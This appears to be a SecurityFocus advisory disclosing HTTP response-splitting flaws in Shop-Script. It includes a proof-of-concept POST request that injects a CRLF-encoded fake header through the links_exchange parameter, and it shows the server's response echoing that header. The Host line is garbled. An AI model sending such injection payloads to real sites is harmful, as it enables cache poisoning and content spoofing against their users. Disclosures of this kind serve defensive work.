source: https://www.securityfocus.com/bid/20685/info
Shop-Script is prone to multiple HTTP response-splitting vulnerabilities because the application fails to properly sanitize user-supplied input.
A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that attempt to entice client users into a false sense of trust.
[Request Header]
POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header
HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET
CLR 1.1.4322)
Host: www.example.comhttp://www.shop-script-demo.com/
Content-Length: 18
Cookie: PHPSESSID=e0d1c748db4ce6fa7886403e65458aaa
Connection: Close
Pragma: no-cache
current_currency=1
[Response Header]
HTTP/1.1 302 Found
Date: Mon, 16 Oct 2006 17:39:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Location: index.php?links_exchange=
FakeHeader:Fake_Custom_Header <= [Custome response
injected by the attacker]
Content-Length: 0
Connection: close
Content-Type: text/html